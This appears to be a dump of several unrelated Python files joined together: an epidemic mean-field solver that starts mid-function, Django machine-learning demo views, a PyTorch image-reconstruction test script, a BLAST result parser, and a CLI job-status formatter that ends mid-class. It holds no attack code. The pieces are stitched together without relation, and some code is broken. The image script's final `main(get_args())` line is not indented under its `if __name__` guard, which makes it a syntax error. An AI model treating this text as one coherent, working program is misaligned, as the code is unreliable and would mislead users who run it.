                if abs(J - J0) <= Jtol/2:
                    step_small_enough = True
                    if abs(J - J0) <= Jtol/10:
                        #step probably too small
                        current_param_var *= 2
                else:
                    # Step rejected: roll the parameter back and halve the step.
                    param -= current_param_var
                    current_param_var /= 2
                    if verbose:
                        print(f"Jacobian difference too big : {abs(J-J0)}")
                        print(f"Reducing parameter variation : {current_param_var}")
            sm,fni = unflatten(state_from_mf(r,inf_mat,state_meta),state_meta)
            param_list.append(param)
            stationary_state_list.append((sm,fni))
            infected_fraction_list.append(infected_fraction(sm,gm))
        else:
            branch_unstable = False
    return (param_list,stationary_state_list,infected_fraction_list)
@jit(nopython=True)
def stationary_state(r0, inf_mat, state_meta, stable=True,
                     h=0.01, rtol=10**(-12), max_iter=5000, verbose=True):
    """stationary_state uses the self-consistent relation to find a fixed
    point (stationary state).
    We consider a transformed system of ODE
        dr/dt = sgn*(M(r) - r)
    where M(r) is the map used to calculate the stationary state value
    of the mean-field r. The sgn (-1, 1) is used to target unstable/stable
    fixed points of the system.
    We use a linearly implicit Euler step on the transformed ODE; note that
    the implemented denominator scales the pseudo-time step by |M(r) - r|
    (plus a 10**(-12) floor to avoid division by zero), i.e.
        r_{t+h} ~ r_t + sgn*(M(r) - r)/((|M(r)-r|+1e-12)/h - sgn*(J_r(r) - 1))
    which damps the update near convergence.
    In this case, a fixed point is stable if the jacobian of the mean-field
    self-consistent equation J_r < 1, whereas it is unstable if J_r > 1.
    :param r0: float for the initial mean-field value
    :param inf_mat: array of shape (nmax+1,nmax+1) representing the infection rate
    :param state_meta: tuple of arrays encoding information of the structure.
    :param stable: bool indicating if the targeted stationary state is stable
                   or unstable.
    :param h: float for the step size of the linearly implicit Euler.
    :param rtol: float for the relative variation desired on the convergence.
    :param max_iter: int for the maximum number of iteration to converge.
    :param verbose: currently unused in this function.
    return r: float for the converged mean-field
    """
    if stable:
        sgn = 1
    else:
        sgn = -1
    converged = False
    it = 0
    r = r0
    while not converged and it < max_iter:
        it += 1
        diff = mf_map(r, inf_mat, state_meta) - r
        rnew = r + sgn*diff/\
                ((abs(diff)+10**(-12))/h - sgn*(jac_mf_map(r, inf_mat, state_meta) - 1))
        # Converged when the relative change of r falls below rtol.
        if abs(rnew/r-1) <= rtol:
            converged = True
        r = rnew
    return r
def stationary_state_safe(inf_mat, state_meta, r_upp=None, r_low=10**(-12)):
    """Find a stationary mean-field value with the bracketing brentq routine.

    :param inf_mat: array of shape (nmax+1,nmax+1) representing the infection rate
    :param state_meta: tuple of arrays encoding information of the structure.
    :param r_upp: optional upper bracket; when None it is derived from a
                  high-density initial state.
    :param r_low: lower bracket for the root search.
    return r: float for the converged mean-field
    """
    if r_upp is None:
        sm, fni = initialize(state_meta, initial_density=0.99)
        upper = mf_from_state(fni, inf_mat, state_meta)
    else:
        upper = r_upp
    return brentq(mf_root_equation, r_low, upper, args=(inf_mat, state_meta))
@jit(nopython=True)
def mf_from_state(fni,inf_mat,state_meta):
    """Compute the mean-field r implied by the group-state distribution fni.

    r is the infection-rate average weighted by susceptible membership,
    restricted to group sizes n >= 2.
    """
    imat = state_meta[5]
    nmat = state_meta[6]
    pnmat = state_meta[7]
    numerator = np.sum(inf_mat[2:,:]*(nmat[2:,:]-imat[2:,:])*fni[2:,:]*pnmat[2:,:])
    denominator = np.sum((nmat[2:,:]-imat[2:,:])*fni[2:,:]*pnmat[2:,:])
    return numerator/denominator
@jit(nopython=True)
def state_from_mf(r,inf_mat,state_meta):
    """Reconstruct the full flattened state (sm, fni) from a mean-field r."""
    nmax = state_meta[1]
    m = state_meta[2]
    gm = state_meta[3]
    pn = state_meta[4]
    #get node state
    sm = (1/(1+m*r))
    rho = r*excess_susceptible_membership(m,gm,sm)
    #get groups state
    fni = np.zeros((nmax+1,nmax+1),dtype=np.float64)
    for n in range(2, nmax+1):
        if pn[n] > 0:
            # Build fni[n] by a detailed-balance-style recurrence in i,
            # then normalize; fni[n][0] = 1 is an arbitrary seed value.
            fni[n][0] = 1
            for i in range(n):
                #unnormalized assignation
                fni[n][i+1] += ((n-i)*(rho+inf_mat[n][i])+i)*fni[n][i]/(i+1)
                if i > 0:
                    fni[n][i+1] -= (n-i+1)*(inf_mat[n][i-1]+rho)*fni[n][i-1]/(i+1)
            #normalize
            fni[n] /= np.sum(fni[n])
    return flatten(sm,fni,state_meta)
@jit(nopython=True)
def mf_map(r, inf_mat, state_meta):
    """Apply the self-consistent mean-field map once: r -> M(r).

    :param r: float representing a mean-field value
    :param inf_mat: array of shape (nmax+1,nmax+1) representing the infection
                    rate
    :param state_meta: tuple of arrays encoding information of the structure.
    """
    mmax = state_meta[0]
    nmax = state_meta[1]
    state_vec = state_from_mf(r,inf_mat,state_meta)
    fni = state_vec[mmax+1:].reshape((nmax+1,nmax+1))
    return mf_from_state(fni,inf_mat,state_meta)
@jit(nopython=True)
def mf_root_equation(r, inf_mat, state_meta):
    """Residual of the self-consistency condition; zero at a stationary state.

    :param r: float representing a mean-field value
    :param inf_mat: array of shape (nmax+1,nmax+1) representing the infection
                    rate
    :param state_meta: tuple of arrays encoding information of the structure.
    """
    return mf_map(r, inf_mat, state_meta) - r
@jit(nopython=True)
def jac_mf_map_(r, inf_mat, state_meta, eps=10**(-8)):
    """Forward finite-difference estimate of dM/dr at r (numerical fallback)."""
    f_plus = mf_map(r+eps,inf_mat,state_meta)
    f_zero = mf_map(r,inf_mat,state_meta)
    return (f_plus-f_zero)/eps
@jit(nopython=True)
def jac_mf_map(r, inf_mat, state_meta):
    """jac_mf_map takes a mean-field r as argument and return the jacobian
    Note : it assumes we are at a fixed point (stationary state)
    :param r: float representing a mean-field value
    :param inf_mat: array of shape (nmax+1,nmax+1) representing the infection
                    rate
    :param state_meta: tuple of arrays encoding information of the structure.
    """
    mmax = state_meta[0]
    nmax = state_meta[1]
    m = state_meta[2]
    gm = state_meta[3]
    pn = state_meta[4]
    imat = state_meta[5]
    nmat = state_meta[6]
    pnmat = state_meta[7]
    v = state_meta and state_from_mf(r,inf_mat,state_meta)
    sm = v[:mmax+1]
    fni = v[mmax+1:].reshape((nmax+1,nmax+1))
    rho = r*excess_susceptible_membership(m,gm,sm)
    #calculate dfni and drdrho
    dni = np.zeros((nmax+1,nmax+1))
    for n in range(2,nmax+1):
        for i in range(1,n+1):
            dni[n][i] = np.sum(1/(inf_mat[n][:i]+rho))
    dfni = -fni*np.outer(np.sum(fni[:,1:]*dni[:,1:],axis=1),np.ones(nmax+1)) + fni*dni
    # NOTE(review): `v` is reused below as a scalar denominator, shadowing the
    # state vector above — intentional but easy to misread.
    u = np.sum(inf_mat*(nmat-imat)*fni*pnmat)
    v = np.sum((nmat-imat)*fni*pnmat)
    du = np.sum(inf_mat*(nmat-imat)*dfni*pnmat)
    dv = np.sum((nmat-imat)*dfni*pnmat)
    drdrho = du/v-u*dv/v**2
    #calculate dsm and drhodr
    dsm = -m/(1+m*r)**2
    u = np.sum(m*(m-1)*sm*gm)
    v = np.sum(m*sm*gm)
    du = np.sum(m*(m-1)*dsm*gm)
    dv = np.sum(m*dsm*gm)
    drhodr = u/v + r*(du/v - u*dv/v**2)
    # Chain rule: dM/dr = (dr/drho) * (drho/dr).
    return drdrho*drhodr
|
<gh_stars>0
from django.shortcuts import render, get_object_or_404
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from .models import Project
from .forms import DataForm
from django.contrib.auth.models import User
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
# from django.utils.inspect import get_func_full_args
# import inspect
from random import choice
from django.shortcuts import render
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import Normalizer
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from tpot.builtins import StackingEstimator
# NOTE(review): `global` at module level is a no-op; `df` is already global here.
global df
# All of the following runs at import time: it builds the iris dataframe and
# reads train.csv from the current working directory (Titanic data).
iris = load_iris()
df = pd.DataFrame(data= np.c_[iris['data'], iris['target']], columns= iris['feature_names'] + ['target'])
# random_state=None: a fresh random split on every import.
training_features, testing_features, training_target, testing_target = train_test_split(iris.data, iris.target,
                                                                                        random_state=None)
titanic = pd.read_csv('train.csv')
titanic.rename(columns={'Survived': 'target'}, inplace=True)
# Encode categorical columns as integers for the sklearn estimators.
titanic['Sex'] = titanic['Sex'].map({'male':0,'female':1})
titanic['Embarked'] = titanic['Embarked'].map({'S':0,'C':1,'Q':2})
# Sentinel fill for missing values (the tree/forest models tolerate it).
titanic = titanic.fillna(-999)
titanic_new = titanic.drop(['Name', 'Ticket', 'Cabin', 'target'], axis=1)
features = titanic_new
training_features_x, testing_features_x, training_classes_x, testing_classes_x = train_test_split(features,
                                                                                                  titanic['target'],
                                                                                                  random_state=None)
# Separate, seeded split of iris used by the interactive form (home view).
X, y = pd.DataFrame(data=iris.data, columns=iris.feature_names), pd.DataFrame(data=iris.target, columns=["iris_type"])
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
y_train, y_test = np.ravel(y_train), np.ravel(y_test)
def on_iris():
    """Fit the exported TPOT pipeline on the iris training split and return it."""
    # Average CV score on the training set was: 0.9818181818181818
    pipeline = make_pipeline(
        Normalizer(norm="l1"),
        StackingEstimator(estimator=LogisticRegression(C=0.0001, dual=False, penalty="l2")),
        DecisionTreeClassifier(criterion="gini", max_depth=7, min_samples_leaf=14, min_samples_split=6),
    )
    pipeline.fit(training_features, training_target)
    return pipeline
def on_titanic():
    """Fit a random forest on the Titanic training split and return it."""
    forest = RandomForestClassifier(bootstrap=False, max_features=0.4, min_samples_leaf=1,
                                    min_samples_split=9)
    forest.fit(training_features_x, training_classes_x)
    return forest
def output_auto(request):
    """Pick a dataset at random, run its model, and render the predictions."""
    func_chosen = choice([on_iris, on_titanic])
    if func_chosen is on_iris:
        results = on_iris().predict(testing_features)
        df_name = 'Iris'
        html_table = df.head().to_html(index=False)
    else:
        results = on_titanic().predict(testing_features_x)
        df_name = 'Titanic'
        html_table = titanic_new.head().to_html(index=False)
    context = {'results': results, 'html_table': html_table, 'df_name': df_name}
    return render(request, 'cybiteml/home.html', context)
def home(request):
    """Render the ML demo form; on a valid POST, train the chosen model and
    show the (optionally NA-filled) dataframe plus predictions and score."""
    if request.method == 'POST':
        form = DataForm(request.POST)
        if form.is_valid():
            size = form.cleaned_data['size']
            missing_q = form.cleaned_data['missing_q']
            missing_val = form.cleaned_data['missing_val']
            algo = form.cleaned_data['algo']
            # NOTE: mutates the module-level dataframe in place when requested.
            if missing_q == 'yes':
                df.fillna(missing_val, inplace=True)
            size_choice = df.head(10) if size == 'head' else df
            size_choice = size_choice.to_html(index=False)
            # Select the estimator; fitting/scoring is identical for all three.
            if algo == 'gnb':
                model = GaussianNB()
            elif algo == 'lrc':
                model = LogisticRegression(random_state=0, solver="lbfgs",max_iter=400, multi_class="multinomial")
            else:
                model = SVC(kernel="linear", C=1.0, gamma="auto")
            model.fit(X_train, y_train)
            y_pred = model.predict(X_test)
            score = model.score(X_test, y_test)
            return render(request, 'cybiteml/home.html',
                          {'disp_df': size_choice, 'y_pred': y_pred, 'score': score})
    else:
        form = DataForm()
    # GET, or POST with an invalid form: show the (possibly bound) form.
    return render(request, 'cybiteml/home.html', {'form': form})
class UserProjectListView(ListView):
    """Paginated list of one user's projects, newest first."""

    model = Project
    template_name = 'cybiteml/user_projects.html'
    context_object_name = 'projects'
    paginate_by = 2

    def get_queryset(self):
        # 404 when the username in the URL does not exist.
        owner = get_object_or_404(User, username=self.kwargs.get('username'))
        return Project.objects.filter(creator=owner).order_by('-date_created')
class ProjectDetailView(DetailView):
    # Renders one Project via Django's default <app>/project_detail.html template.
    model = Project
class ProjectCreateView(LoginRequiredMixin, CreateView):
    """Create a Project owned by the logged-in user."""

    model = Project
    fields = ['title', 'description', 'file']

    def form_valid(self, form):
        # Stamp ownership before the parent view saves the instance.
        form.instance.creator = self.request.user
        return super().form_valid(form)
class ProjectUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    """Edit a Project; only its creator passes the access test."""

    model = Project
    fields = ['title', 'description', 'file']

    def form_valid(self, form):
        # Keep ownership pinned to the requesting user on save.
        form.instance.creator = self.request.user
        return super().form_valid(form)

    def test_func(self):
        # Idiom fix: return the comparison directly instead of if/True/False.
        return self.request.user == self.get_object().creator
class ProjectDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
    """Delete a Project; only its creator passes the access test."""

    model = Project
    success_url = '/'

    def test_func(self):
        # Idiom fix: return the comparison directly instead of if/True/False.
        return self.request.user == self.get_object().creator
|
<reponame>nrupatunga/pytorch-deaf
"""
File: test_new.py
Author: Nrupatunga
Email: <EMAIL> Github: https://github.com/nrupatunga
Description: Test script
"""
import argparse
import cv2
import matplotlib.pyplot as plt
import numpy as np
import torch
from scipy.fftpack import fft2, ifft2
from litdeaf import deafLitModel
from src.utility.psf2otf import psf2otf
# Gradients are divided by this factor before entering the network and
# multiplied back in main(); keep the two sides in sync.
SCALE_INPUT = 0.5
def get_h_input(S):
    """Circular horizontal (axis-1) forward difference of S, scaled by 1/SCALE_INPUT."""
    # Wrap-around column so the difference is periodic along axis 1.
    wrap_col = (S[:, 0, :] - S[:, -1, :])[:, np.newaxis, :]
    grads = np.hstack([np.diff(S, axis=1), wrap_col])
    return grads / SCALE_INPUT
def get_v_input(S):
    """Circular vertical (axis-0) forward difference of S, scaled by 1/SCALE_INPUT."""
    # Wrap-around row so the difference is periodic along axis 0.
    wrap_row = (S[0, ...] - S[-1, ...])[np.newaxis, ...]
    grads = np.vstack([np.diff(S, axis=0), wrap_row])
    return grads / SCALE_INPUT
def get_outputs(ckpt_path, img_path, gpu=True):
    """Run the checkpointed model on the image's horizontal and vertical gradients.

    :param ckpt_path: path to the lightning checkpoint
    :param img_path: path to the input image (read with OpenCV, scaled to [0,1])
    :param gpu: run the model on CUDA when True, CPU otherwise
    :returns: list [S, h_out, v_out] — the input image followed by the
              network outputs for the horizontal and vertical passes.
    Fix: removed the unreachable `if False:` debug-plot block and the
    `final_out`/`data_in`-transpose computations that only fed it.
    """
    S_out = []
    S = cv2.imread(img_path) / 255.
    S_out.append(S)
    for i in range(2):
        if i == 0:
            h_input = get_h_input(S)
            # Horizontal pass is fed transposed; undone again below.
            data_in = np.transpose(h_input, [1, 0, 2])
        else:
            v_input = get_v_input(S)
            data_in = v_input
        data = np.transpose(data_in, [2, 0, 1])
        # Normalise with what appear to be training-set statistics (mean, std).
        data = data - 8.8276e-7
        data = data / 0.1637
        data = torch.tensor(data).unsqueeze(0)
        data = data.float()
        # Model loading from checkpoint
        if gpu:
            model = deafLitModel.load_from_checkpoint(ckpt_path).cuda()
        else:
            model = deafLitModel.load_from_checkpoint(ckpt_path,
                                                      map_location=torch.device('cpu'))
        model.eval()
        model.freeze()
        if gpu:
            output = model._model(data.cuda()).squeeze().cpu().numpy()
        else:
            output = model._model(data).squeeze().numpy()
        output = np.transpose(output, [1, 2, 0])
        out = np.zeros_like(data_in)
        # Network output is smaller than the input; paste it at offset (4, 4).
        out[4:4 + output.shape[0], 4:4 + output.shape[1], :] = output
        if i == 0:
            # Undo the transpose applied to the horizontal input.
            out = np.transpose(out, [1, 0, 2])
        S_out.append(out)
    return S_out
def main(args):
    """Reconstruct an image from the network's predicted gradients.

    Solves the screened Poisson-style system in the Fourier domain
    (FS = (Normin1 + beta*Normin2) / Denormin), writes output.png, and shows
    the input next to the reconstruction.
    """
    ckpt_path = args.ckpt_path
    img_path = args.img_path
    [S, h, v] = get_outputs(ckpt_path, img_path, args.gpu)
    # Undo the 1/SCALE_INPUT scaling applied in get_h_input/get_v_input.
    h = h * SCALE_INPUT
    v = v * SCALE_INPUT
    # Regularisation weight; presumably tuned for this model — TODO confirm.
    beta = 8.388608e+1 / 2.
    S_in = S
    # Optical transfer functions of the forward-difference kernels.
    psf = np.asarray([[-1, 1]])
    out_size = (S.shape[0], S.shape[1])
    otfx = psf2otf(psf, out_size)
    psf = np.asarray([[-1], [1]])
    otfy = psf2otf(psf, out_size)
    Normin1 = fft2(np.squeeze(S), axes=(0, 1))
    Denormin2 = np.square(abs(otfx)) + np.square(abs(otfy))
    Denormin2 = Denormin2[..., np.newaxis]
    # Broadcast the denominator over the 3 colour channels.
    Denormin2 = np.repeat(Denormin2, 3, axis=2)
    Denormin = 1 + beta * Denormin2
    # Divergence of the gradient field (circular backward differences).
    h_diff = -np.diff(h, axis=1)
    first_col = h[:, -1, :] - h[:, 0, :]
    first_col = first_col[:, np.newaxis, :]
    h_diff = np.hstack([first_col, h_diff])
    v_diff = -np.diff(v, axis=0)
    first_row = v[-1, ...] - v[0, ...]
    first_row = first_row[np.newaxis, ...]
    v_diff = np.vstack([first_row, v_diff])
    Normin2 = h_diff + v_diff
    # Normin2 = beta * np.fft.fft2(Normin2, axes=(0, 1))
    Normin2 = beta * fft2(Normin2, axes=(0, 1))
    Normin1 = fft2(np.squeeze(S), axes=(0, 1))
    FS = np.divide(np.squeeze(Normin1) + np.squeeze(Normin2),
                   Denormin)
    # S = np.real(np.fft.ifft2(FS, axes=(0, 1)))
    S = np.real(ifft2(FS, axes=(0, 1)))
    S = np.squeeze(S)
    S = np.clip(S, 0, 1)
    S = S * 255
    S = S.astype(np.uint8)
    cv2.imwrite('output.png', S)
    # Convert BGR (OpenCV) to RGB for matplotlib display.
    S = cv2.cvtColor(S, cv2.COLOR_BGR2RGB)
    S_in = S_in * 255
    S_in = S_in.astype(np.uint8)
    S_in = cv2.cvtColor(S_in, cv2.COLOR_BGR2RGB)
    plt.imshow(np.hstack((S_in, S)))
    plt.draw()
    plt.waitforbuttonpress(0)
    plt.close()
def get_args():
    """Parse and return the command-line arguments for this test script."""
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument(
        '--ckpt_path',
        type=str,
        help='ckpt path')
    # NOTE(review): action='store_false' means gpu defaults to True and
    # passing --gpu *disables* the GPU — confirm this inversion is intended.
    parser.add_argument('--gpu', action='store_false', help='gpu/cpu')
    parser.add_argument(
        '--img_path',
        type=str,
        help='image path')
    return parser.parse_args()
if __name__ == "__main__":
main(get_args())
|
<reponame>ad3002/Lyrebird
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#@created: 07.09.2011
#@author: <NAME>
#@contact: <EMAIL>
from PyExp import AbstractModel
from trseeker.seqio.tab_file import sc_iter_tab_file
class BlastResultModel(AbstractModel):
    """ Class for blast result data.

    One instance corresponds to one row of tabular BLAST output.

    Attributes:

    - "query_id" (int),
    - "query_gi" (int),
    - "query_ref",
    - "subject_id",
    - "subject_gi"(int),
    - "subject_ref",
    - "query_start" (int),
    - "query_end" (int),
    - "subject_start" (int),
    - "subject_end" (int),
    - "evalue" (float),
    - "bit_score" (float),
    - "score" (int),
    - "alignment_length" (int),
    - "proc_identity" (float),
    - "identical" (int),
    - "mismatches" (int),
    - "positives" (int),
    - "gap_opens" (int),
    - "gaps" (int),
    - "proc_positives" (float),
    - "frames",
    - "query_frame" (int),
    - "subject_frame" (int),
    - "fraction_of_query" (float),
    """
    # Column order used by AbstractModel when (de)serialising a tab row.
    dumpable_attributes = ["query_id",
                           "query_gi",
                           "query_ref",
                           "subject_id",
                           "subject_gi",
                           "subject_ref",
                           "query_start",
                           "query_end",
                           "subject_start",
                           "subject_end",
                           "evalue",
                           "bit_score",
                           "score",
                           "alignment_length",
                           "proc_identity",
                           "identical",
                           "mismatches",
                           "positives",
                           "gap_opens",
                           "gaps",
                           "proc_positives",
                           "frames",
                           "query_frame",
                           "subject_frame",
                           "fraction_of_query",
                           ]
    # Fields coerced to int on load (presumably by AbstractModel — confirm).
    int_attributes = ["query_start",
                      "query_end",
                      "subject_start",
                      "subject_end",
                      "score",
                      "alignment_length",
                      "identical",
                      "mismatches",
                      "positives",
                      "gap_opens",
                      "gaps",
                      "query_frame",
                      "subject_frame",
                      ]
    # Fields coerced to float on load.
    float_attributes = ["evalue",
                        "proc_identity",
                        "proc_positives",
                        "fraction_of_query",
                        "bit_score",
                        ]
def read_blast_file(blast_file, length):
    """Read a tabular BLAST output file.

    Strips "#" comment lines from the file (rewriting it in place), then
    parses each remaining row into a BlastResultModel.

    Args:
        blast_file: path to a tabular BLAST output file.
        length: query length used to compute fraction_of_query;
            falsy to skip that computation.

    Returns:
        dict mapping subject_ref -> list of BlastResultModel matches.
    """
    # TODO: move it to readers
    gi_to_results = {}
    # Remove "#" comment lines from the blast file.
    data = []
    with open(blast_file) as fh:
        for line in fh:
            if line.startswith("#"):
                continue
            data.append(line)
    if not data:
        return gi_to_results
    data[-1] = data[-1].strip()
    with open(blast_file, "w") as fh:
        fh.writelines(data)
    # Parse the cleaned rows.
    for blast_obj in sc_iter_tab_file(blast_file, BlastResultModel):
        # BUG FIX: the original tested query_end twice and never query_start;
        # both alignment endpoints must be present.
        if blast_obj.query_start is None or blast_obj.query_end is None:
            # Modernized from the Python 2 print statement.
            print("Error parsing blast results:", blast_obj)
            continue
        if length:
            blast_obj.fraction_of_query = abs(blast_obj.query_start - blast_obj.query_end) / float(length)
        gi_to_results.setdefault(blast_obj.subject_ref, []).append(blast_obj)
    return gi_to_results
|
import abc
import datetime
import itertools
import sys
import time
from dataclasses import dataclass
from types import TracebackType
from typing import Callable, Dict, Iterable, List, Optional, Tuple, Type
import humanize
from rich import box
from rich.console import Console, ConsoleRenderable, RenderableType, RenderHook
from rich.control import Control
from rich.live_render import LiveRender
from rich.markup import escape as rich_escape
from rich.styled import Styled
from rich.table import Table
from rich.text import Text, TextType
from neuro_sdk import JobDescription, JobRestartPolicy, JobStatus, JobTelemetry
from neuro_cli.formatters.utils import DatetimeFormatter
from neuro_cli.parse_utils import JobTableFormat, JobTelemetryKeyFunc
from neuro_cli.utils import format_size
from .utils import (
ImageFormatter,
URIFormatter,
format_timedelta,
image_formatter,
no,
yes,
)
# Rich style color used when rendering each job status.
COLORS = {
    JobStatus.PENDING: "cyan",
    JobStatus.SUSPENDED: "magenta",
    JobStatus.RUNNING: "blue",
    JobStatus.SUCCEEDED: "green",
    JobStatus.CANCELLED: "yellow",
    JobStatus.FAILED: "red",
    JobStatus.UNKNOWN: "bright_red",
}
# Spinner frames for live progress lines; plain ASCII on Windows consoles,
# which may lack glyphs for the block characters used elsewhere.
if sys.platform == "win32":
    SPINNER = itertools.cycle(r"-\|/")
else:
    SPINNER = itertools.cycle("◢◣◤◥")
def fmt_status(status: JobStatus) -> Text:
    """Render a job status value as rich Text colored per COLORS ("none" fallback)."""
    return Text(status.value, style=COLORS.get(status, "none"))
def get_lifespan_ends(job: JobDescription) -> Optional[datetime.datetime]:
    """Estimate when the job's life span expires.

    Returns None for finished jobs or jobs with no life-span limit.
    """
    active_states = (
        JobStatus.PENDING,
        JobStatus.RUNNING,
        JobStatus.SUSPENDED,
    )
    if job.status not in active_states or not job.life_span:
        return None
    remaining = datetime.timedelta(seconds=job.life_span) - datetime.timedelta(
        seconds=job.history.run_time_seconds or 0
    )
    return datetime.datetime.now(datetime.timezone.utc) + remaining
class JobStatusFormatter:
    """Render a detailed key/value table describing a single job."""

    def __init__(
        self, uri_formatter: URIFormatter, datetime_formatter: DatetimeFormatter
    ) -> None:
        self._format_uri = uri_formatter
        self._datetime_formatter = datetime_formatter
        self._format_image = image_formatter(uri_formatter=uri_formatter)

    def __call__(self, job_status: JobDescription) -> RenderableType:
        """Build and return the rich table for *job_status*."""
        assert job_status.history is not None
        table = Table(box=None, show_header=False, show_edge=False)
        table.add_column()
        table.add_column(style="bold")
        # Identity / ownership.
        table.add_row("Job", job_status.id)
        if job_status.name:
            table.add_row("Name", job_status.name)
        if job_status.tags:
            text = ", ".join(job_status.tags)
            table.add_row("Tags", text)
        table.add_row("Owner", job_status.owner or "")
        table.add_row("Cluster", job_status.cluster_name)
        if job_status.org_name:
            table.add_row("Organization", job_status.org_name)
        if job_status.description:
            table.add_row("Description", job_status.description)
        status_text = fmt_status(job_status.status)
        if job_status.history.reason:
            status_text = Text.assemble(status_text, f" ({job_status.history.reason})")
        table.add_row("Status", status_text)
        table.add_row("Image", self._format_image(job_status.container.image))
        if job_status.container.entrypoint:
            table.add_row("Entrypoint", job_status.container.entrypoint)
        if job_status.container.command:
            table.add_row("Command", job_status.container.command)
        if job_status.container.working_dir:
            table.add_row("Working dir", job_status.container.working_dir)
        if job_status.preset_name:
            table.add_row("Preset", job_status.preset_name)
        table.add_row("Priority", f"{job_status.priority.name.capitalize()}")
        table.add_row(
            "Price (credits / hour)", f"{job_status.price_credits_per_hour:.4f}"
        )
        table.add_row("Current cost", f"{job_status.total_price_credits:.4f}")
        # Nested resources sub-table.
        resources = Table(box=None, show_header=False, show_edge=False)
        resources.add_column()
        resources.add_column(style="bold", justify="right")
        resources.add_row(
            "Memory", format_size(job_status.container.resources.memory_mb * 1024**2)
        )
        resources.add_row("CPU", f"{job_status.container.resources.cpu:0.1f}")
        if job_status.container.resources.gpu:
            resources.add_row(
                "GPU",
                f"{job_status.container.resources.gpu:0.1f} x "
                f"{job_status.container.resources.gpu_model}",
            )
        if job_status.container.resources.tpu_type:
            resources.add_row(
                "TPU",
                f"{job_status.container.resources.tpu_type}/"
                # BUG FIX: this fragment was missing its "f" prefix, so the
                # literal "{job_status...}" placeholder text was displayed
                # instead of the TPU software version.
                f"{job_status.container.resources.tpu_software_version}",
            )
        if job_status.container.resources.shm:
            resources.add_row("Extended SHM space", "True")
        table.add_row("Resources", Styled(resources, style="reset"))
        if job_status.scheduler_enabled:
            table.add_row("Round Robin", "True")
        if job_status.preemptible_node:
            table.add_row("Preemptible Node", "True")
        if job_status.restart_policy != JobRestartPolicy.NEVER:
            table.add_row("Restart policy", job_status.restart_policy.value)
            if job_status.history.restarts != 0:
                table.add_row("Restarts", str(job_status.history.restarts))
        if job_status.life_span is not None:
            table.add_row("Life span", format_life_span(job_status.life_span))
        table.add_row("TTY", str(job_status.container.tty))
        if job_status.container.volumes:
            volumes = Table(box=None, show_header=False, show_edge=False)
            volumes.add_column("")
            volumes.add_column("")
            volumes.add_column("")
            for volume in job_status.container.volumes:
                volumes.add_row(
                    volume.container_path,
                    self._format_uri(volume.storage_uri),
                    "READONLY" if volume.read_only else " ",
                )
            table.add_row("Volumes", Styled(volumes, style="reset"))
        if job_status.container.secret_files:
            secret_files = Table(box=None, show_header=False, show_edge=False)
            secret_files.add_column("")
            secret_files.add_column("")
            for secret_file in job_status.container.secret_files:
                secret_files.add_row(
                    secret_file.container_path, self._format_uri(secret_file.secret_uri)
                )
            table.add_row("Secret files", Styled(secret_files, style="reset"))
        if job_status.container.disk_volumes:
            disk_volumes = Table(box=None, show_header=False, show_edge=False)
            disk_volumes.add_column("")
            disk_volumes.add_column("")
            disk_volumes.add_column("")
            for disk_volume in job_status.container.disk_volumes:
                disk_volumes.add_row(
                    disk_volume.container_path,
                    self._format_uri(disk_volume.disk_uri),
                    "READONLY" if disk_volume.read_only else " ",
                )
            table.add_row("Disk volumes", Styled(disk_volumes, style="reset"))
        if job_status.internal_hostname:
            table.add_row("Internal Hostname", job_status.internal_hostname)
        if job_status.internal_hostname_named:
            table.add_row("Internal Hostname Named", job_status.internal_hostname_named)
        if job_status.http_url:
            table.add_row("Http URL", str(job_status.http_url))
        if job_status.container.http:
            table.add_row("Http port", str(job_status.container.http.port))
            table.add_row(
                "Http authentication", str(job_status.container.http.requires_auth)
            )
        if job_status.container.env:
            environment = Table(box=None, show_header=False, show_edge=False)
            environment.add_column("")
            environment.add_column("")
            for key, value in job_status.container.env.items():
                environment.add_row(key, value)
            table.add_row("Environment", Styled(environment, style="reset"))
        if job_status.container.secret_env:
            secret_env = Table(box=None, show_header=False, show_edge=False)
            secret_env.add_column("")
            secret_env.add_column("")
            for key, uri in job_status.container.secret_env.items():
                secret_env.add_row(key, self._format_uri(uri))
            table.add_row("Secret environment", Styled(secret_env, style="reset"))
        # Lifecycle timestamps; started/finished only exist in some states.
        assert job_status.history.created_at is not None
        table.add_row(
            "Created",
            self._datetime_formatter(job_status.history.created_at, precise=True),
        )
        if job_status.status in [
            JobStatus.RUNNING,
            JobStatus.SUSPENDED,
            JobStatus.FAILED,
            JobStatus.SUCCEEDED,
            JobStatus.CANCELLED,
        ]:
            assert job_status.history.started_at is not None
            table.add_row(
                "Started",
                self._datetime_formatter(job_status.history.started_at, precise=True),
            )
        lifespan_ends = get_lifespan_ends(job_status)
        if lifespan_ends:
            table.add_row(
                "Life span ends (approx)", self._datetime_formatter(lifespan_ends)
            )
        if job_status.status in [
            JobStatus.CANCELLED,
            JobStatus.FAILED,
            JobStatus.SUCCEEDED,
        ]:
            assert job_status.history.finished_at is not None
            table.add_row(
                "Finished",
                self._datetime_formatter(job_status.history.finished_at, precise=True),
            )
            table.add_row("Exit code", str(job_status.history.exit_code))
        if job_status.status == JobStatus.FAILED and job_status.history.description:
            table.add_row("Description", job_status.history.description)
        if job_status.history.transitions:
            status_transitions = Table(box=None, show_header=True, show_edge=False)
            status_transitions.add_column("Status")
            status_transitions.add_column("Time")
            for status_item in job_status.history.transitions:
                status_text = fmt_status(status_item.status)
                if status_item.reason:
                    status_text = Text.assemble(status_text, f" ({status_item.reason})")
                status_transitions.add_row(
                    status_text,
                    self._datetime_formatter(status_item.transition_time, precise=True),
                )
            table.add_row(
                "Status transitions", Styled(status_transitions, style="reset")
            )
        return table
class LifeSpanUpdateFormatter:
    """Format the confirmation message shown after a job's life span changes."""

    def __init__(self, datetime_formatter: DatetimeFormatter) -> None:
        self._datetime_formatter = datetime_formatter

